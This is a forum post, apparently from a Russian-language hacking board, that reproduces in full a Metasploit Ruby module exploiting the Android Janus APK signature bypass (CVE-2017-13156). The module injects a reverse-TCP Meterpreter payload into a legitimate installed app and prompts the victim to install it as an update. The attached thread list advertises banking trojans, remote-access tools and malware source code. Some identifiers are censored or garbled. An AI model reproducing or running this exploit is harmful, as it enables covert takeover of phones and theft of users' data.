Интересно Android Janus - APK Signature Bypass (****sploit) THROOT

[email protected]

Original poster
Pro Member
Сообщения
48
Реакции
23
Посетить сайт
##
# This module requires ****sploit:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


# Current source:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


##
require 'msf/core/payload/apk'

class ****sploitModule < Msf::Exploit::Local
Rank = ManualRanking

include Msf::Exploit::FileDropper
include Msf::post::File
include Msf::post::Android::priv
include Msf::payload::Android

def initialize(info={})
super( update_info( info, {
'Name' => "Android Janus APK Signature bypass",
'Description' => %q{
This module exploits CVE-2017-13156 in Android to install a payload into another
application. The payload APK will have the same signature and can be installed
as an update, preserving the existing data.
The vulnerability was fixed in the 5th December 2017 security patch, and was
additionally fixed by the APK Signature scheme v2, so only APKs signed with
the v1 scheme are vulnerable.
Payload handler is disabled, and a multi/handler must be started first.
},
'Author' => [
'GuardSquare', # discovery
'V-E-O', # proof of concept
'timwr', # ****sploit module
'h00die', # ****sploit module
],
'References' => [
[ 'CVE', '2017-13156' ],
[ 'URL', '

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' ],
[ 'URL', '

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' ],
],
'DisclosureDate' => 'Jul 31 2017',
'SessionTypes' => [ 'meterpreter' ],
'Platform' => [ 'android' ],
'Arch' => [ ARCH_DALVIK ],
'Targets' => [ [ 'Automatic', {} ] ],
'DefaultOptions' => {
'PAYLOAD' => 'android/meterpreter/reverse_tcp',
'AndroidWakelock' => false, # the target may not have the WAKE_LOCK permission
'DisablePayloadHandler' => true,
},
'DefaultTarget' => 0,
'Notes' => {
'SideEffects' => ['ARTIFACTS_ON_DISK', 'SCREEN_EFFECTS'],
'Stability' => ['SERVICE_RESOURCE_LOSS'], # ZTE youtube app won't start anymore
}
}))
register_options([
OptString.new('PACKAGE', [true, 'The package to target, or ALL to attempt all', 'com.phonegap.camerasample']),
])
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
]
end

def check
os = cmd_exec("getprop ro.build.version.release")
unless Gem::Version.new(os).between?(Gem::Version.new('5. 1.1'), Gem::Version.new('8.0.0'))
vprint_error "Android version #{os} is not vulnerable."
return CheckCode::Safe
end
vprint_good "Android version #{os} appears to be vulnerable."

patch = cmd_exec('getprop ro.build.version.security_patch')
if patch.empty?
print_status 'Unable to determine patch level. Pre-5.0 this is unaccessible.'
elsif patch > '2017-12-05'
vprint_error "Android security patch level #{patch} is patched."
return CheckCode::Safe
else
vprint_good "Android security patch level #{patch} is vulnerable"
end

CheckCode::Appears
end

def exploit

def infect(apkfile)
unless apkfile.start_with?("package:")
fail_with Failure::BadConfig, 'Unable to locate app apk'
end
apkfile = apkfile[8..-1]
print_status "Downloading APK: #{apkfile}"
apk_data = read_file(apkfile)

begin
# Create an apk with the payload injected
apk_backdoor = ::Msf::payload::Apk.new
apk_zip = apk_backdoor.backdoor_apk(nil, payload.encoded, false, false, apk_data, false)

# Extract the classes.dex
dex_data = ''
Zip::File.open_buffer(apk_zip) do |zipfile|
dex_data = zipfile.read("classes.dex")
end
dex_size = dex_data.length

# Fix the original APKs zip file code directory
cd_end_addr = apk_data.rindex("\x50\x4b\x05\x06")
cd_start_addr = apk_data[cd_end_addr+16, cd_end_addr+20].unpack("V")[0]
apk_data[cd_end_addr+16...cd_end_addr+20] = [ cd_start_addr+dex_size ].pack("V")
pos = cd_start_addr
while pos && pos < cd_end_addr
offset = apk_data[pos+42, pos+46].unpack("V")[0]
apk_data[pos+42...pos+46] = [ offset+dex_size ].pack("V")
pos = apk_data.index("\x50\x4b\x01\x02", pos+46)
end

# Prepend the new classes.dex to the apk
out_data = dex_data + apk_data
out_data[32...36] = [ out_data.length ].pack("V")
out_data = fix_dex_header(out_data)

out_apk = "/sdcard/#{Rex::Text.rand_text_alphanumeric 6}.apk"
print_status "Uploading APK: #{out_apk}"
write_file(out_apk, out_data)
register_file_for_cleanup(out_apk)
print_status "APK uploaded"

# Prompt the user to update the APK
session.appapi.app_install(out_apk)
print_status "User should now have a prompt to install an updated version of the app"
true
rescue => e
print_error e.to_s
false
end
end

unless [CheckCode:
etected, CheckCode::Appears].include? check
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end

if datastore["PACKAGE"] == 'ALL'
vprint_status('Finding installed packages (this can take a few minutes depending on list of installed packages)')
apkfiles = []
all = cmd_exec("pm list packages").split("\n")
c = 1
all.each do |package|
package = package.split(':')[1]
vprint_status("Attempting exploit of apk #{c}/#{all.length} for #{package}")
c += 1
next if ['com.****sploit.stage', # a**** injecting into ourself
].include? package # This was left on purpose to be expanded as need be for testing
result = infect(cmd_exec("pm path #{package}"))
break if result
end
else
infect(cmd_exec("pm path #{datastore["PACKAGE"]}"))
end
end
end
 
Название темы
Автор Заголовок Раздел Ответы Дата
ExBOT Продам Банковский троян Huracan! ANDROID Malware, эксплойты, связки, крипт 10
H Начальная оборона Android Полезные статьи 0
Admin Как узнать местоположение человека по фото [ANDROID] Анонимность и приватность 8
S Source code original cerberus android Malware, эксплойты, связки, крипт 3
Anorali Интересно Как использовать Xploitspy для взлома телефонов Android? Полезные статьи 6
B Ищем Android разработчика! Предоставляю работу. Ищу специалиста. 0
K Интересно Samsung galaxy a70 Android 10 Вопросы и интересы 5
Eteriass Интересно СОЗДАЕМ BACKDOOR ДЛЯ ANDROID Вирусология 18
Denik Интересно Трояны для слежки под Windows, macOS, Linux, Android, iOS Анонимность и приватность 0
CMDfromBAT [Розыгрыш] SpyNote Android-RAT v5.0 !Stable Version! - 5 ПРИЗОВЫХ МЕСТ! [Завершено] Розыгрыши 1
Denik Интересно Бесплатный интернет на Android Уязвимости и взлом 2
LegolasGL Интересно Мошенники вымогают «штрафы» у пользователей Android от имени ФБР Новости в сети 0
M Безопасность на Android Уязвимости и взлом 0
Fiora Android Bot Способы заработка 3
E Интересно Превращаем обычный смартфон с Android в настоящий Windows Полезные статьи 0
evrusd Android PC Botnet Installs exe,apk Услуги дизайнеров/веб-разработчиков 0
Arcana Пак Android RATs 2019 Spam/DDOS/Malware 30
SSHMAN Атаки: 800 000 россиян стали жертвами банковского Android-ботнета Новости в сети 1
Stefann Xhelper продолжает заражать Android Новости в сети 3
S Loki Bot 2.0 Android Banker Botnet Spam/DDOS/Malware 3
shellest SpyNote v2 (RAT для Android'а) Spam/DDOS/Malware 6
E 49 скрытых команд Android Другое 3
W BOOM для IOS / Android [бесплатно] Полезные статьи 0
mostbiggestshark Хакер - Android: Бэкдор в смартфонах Huawei и особенности реaлизации TrustZone в Samsung Корзина 0
A Взлом Android Предоставляю работу. Ищу специалиста. 2
one_dark Тысячи Android-приложений могут содержать RCE-уязвимость Новости в сети 0
S Проверено Android load (Загрузки) Трафик, загрузки, инсталлы, iframe 1
B Проверено продажа android инсталов Трафик, загрузки, инсталлы, iframe 0
Admin Jabber на android для безопасного общения Анонимность и приватность 7
Admin Срочное уничтожение данных на Android Анонимность и приватность 3
V Проверено Продажа Android/Desktop траффика с бирж Трафик, загрузки, инсталлы, iframe 0
E Проверено Схема на инсталлы с пуш сетки +ENG Android+Desktop Трафик, загрузки, инсталлы, iframe 0
B продажа android инсталов Трафик, загрузки, инсталлы, iframe 0
W Выкупим android инсталлы РУ Куплю/Обменяю 1
G АНДРОИД ИНСТАЛЛЫ РУ || ANDROID INSTALL RU Трафик, загрузки, инсталлы, iframe 0
× Приложения для работы с сетью на Android Полезные статьи 0
A Комплексная защита android приложений. Malware, эксплойты, связки, крипт 1
W WizardBot - первоклассное android решение Malware, эксплойты, связки, крипт 0
A Cerberus ANDROID Bot Malware, эксплойты, связки, крипт 1
shellest Пишем свой перехватчик СМС Android Другие ЯП 2
alter Android Clipper Продажа софта 3
АнАлЬнАя ЧуПаКаБрА INLINE cyberghostvpn.com Android API Проекты Private Keeper 1
Псина1 SpyNote 6.4 [ Android RAT ] Spam/DDOS/Malware 3
Allen Слив снифа банков IOS/Android (+ Бонус банк брут) Другое 2
Tania1212 Продам Продаю сервер работающий под Android приложение на тематику анонимного чата Сайты/Хостинг/Сервера 0
W Анонимизируем Android Полезные статьи 0
T0pDro4eR Знакомство с Frida - фреймворк позволяющий ломать Android приложения [ЧАСТЬ 1] Софт для работы с текстом/Другой софт 3
1 DroidJack 4.4 Удаленное управление Android Spam/DDOS/Malware 0
1 DroidJack 4.4 Удаленное управление Android Софт для работы с текстом/Другой софт 1
P Android под колпаком. Как раскрывают кейсы взлома мобильных устройств Софт для работы с текстом/Другой софт 4

Название темы